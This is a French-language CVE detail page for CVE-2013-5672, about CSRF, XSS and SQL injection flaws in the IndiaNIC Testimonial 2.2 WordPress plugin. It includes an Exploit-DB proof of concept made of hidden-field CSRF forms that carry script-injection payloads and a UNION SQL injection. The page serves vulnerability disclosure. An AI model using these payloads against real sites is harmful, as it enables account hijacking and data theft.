CVE-2013-5672 : Détail

CVE-2013-5672

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
1.35%V3
Network
2013-09-10
17h00 +00:00
2017-08-28
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple cross-site request forgery (CSRF) vulnerabilities in the IndiaNIC Testimonial plugin 2.2 for WordPress allow remote attackers to hijack the authentication of administrators for requests that (1) add a testimonial via an iNIC_testimonial_save action; (2) add a listing template via an iNIC_testimonial_save_listing_template action; (3) add a widget template via an iNIC_testimonial_save_widget action; insert cross-site scripting (XSS) sequences via the (4) project_name, (5) project_url, (6) client_name, (7) client_city, (8) client_state, (9) description, (10) tags, (11) video_url, or (12) is_featured, (13) title, (14) widget_title, (15) no_of_testimonials, (16) filter_by_country, (17) filter_by_tags, or (18) widget_template parameter to wp-admin/admin-ajax.php.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 28054

Date de publication : 2013-09-02 22h00 +00:00
Auteur : RogueCoder
EDB Vérifié : No

Details ======================== Application: Testimonial Version: 2.2 Type: Wordpress plugin Vendor: IndiaNIC Vulnerability: - XSS (CWE-79) - CSRF (CWE-352) - SQL Injection (CWE-89) Description ======================== Testimonial Plugin allows you to add, delete, edit and place what others said about your web site. Loaded with unequaled features, this plugin gets you complete control over testimonials. This is the very first Plug-in which is designed especially keeping our motto in mind that ‘every client is important’. It is as an imperative tool for supervising your official website in accordance to your clients. Vulnerability ======================== This plugin is vulnerable to cross-site request forgery, cross-site scripting and sql injection. 1. Add testimonial form is vulnerable to CSRF and XSS 2. Add listings template is vulnerable to CSRF, XSS and SQLi 3. Add widget template is vulnerable to CSRF and XSS Proof of Concept ======================== 1. Add testimonial <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save"> <input type="hidden" name="project_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="project_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>"> <input type="hidden" name="client_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>"> <input type="hidden" name="client_city" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>"> <input type="hidden" name="client_state" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>"> <input type="hidden" name="client_country" value="Belgium"> <input type="hidden" name="description" value="<script>alert(String.fromCharCode(67,83,82,70,32,54))</script>"> <input type="hidden" name="tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,55))</script>"> <input type="hidden" name="video_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,56))</script>"> <input type="hidden" name="is_featured" value="<script>alert(String.fromCharCode(67,83,82,70,32,57))</script>"> <input type="submit" value="Save Testimonial"> </form> 2. Add listings template <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save_listing_template"> <input type="hidden" name="id" value="9"> <input type="hidden" name="title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="no_of_testimonial" value="5"> <input type="hidden" name="list_per_page" value="5"> <input type="hidden" name="ord_by" value="id"> <input type="hidden" name="ord_type" value="ASC"> <input type="hidden" name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#"> <input type="hidden" name="show_featured_at" value="top"> <input type="hidden" name="no_of_featured" value="2"> <input type="hidden" name="featured_template" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="hidden" name="listing_template_odd" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="hidden" name="listing_template_even" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="submit" value="Add Template"> </form> 3. Add widget template <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save_widget"> <input type="hidden" name="widget_title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="no_of_testimonials" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>"> <input type="hidden" name="filter_by_country" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>"> <input type="hidden" name="filter_by_tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>"> <input type="hidden" name="widget_template" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>"> <input type="submit" value="Add Template"> </form> Solution ======================== No patch has been provided by vendor. Solution would be to stop using this plugin in a public environment Timeline ======================== 2013-08-07 - Email sent to IndiaNIC 2013-08-08 - Notification left on the plugin's Support board on wordpress.org 2013-09-01 - No response or patch released. Publicly disclosed

Products Mentioned

Configuraton 0

Indianic>>Testimonial_plugin >> Version 2.2

Wordpress>>Wordpress >> Version -

Références

http://www.securityfocus.com/bid/62109
Tags : vdb-entry, x_refsource_BID
http://seclists.org/fulldisclosure/2013/Sep/5
Tags : mailing-list, x_refsource_FULLDISC
http://seclists.org/oss-sec/2013/q3/531
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/54640
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.exploit-db.com/exploits/28054
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/96792
Tags : vdb-entry, x_refsource_OSVDB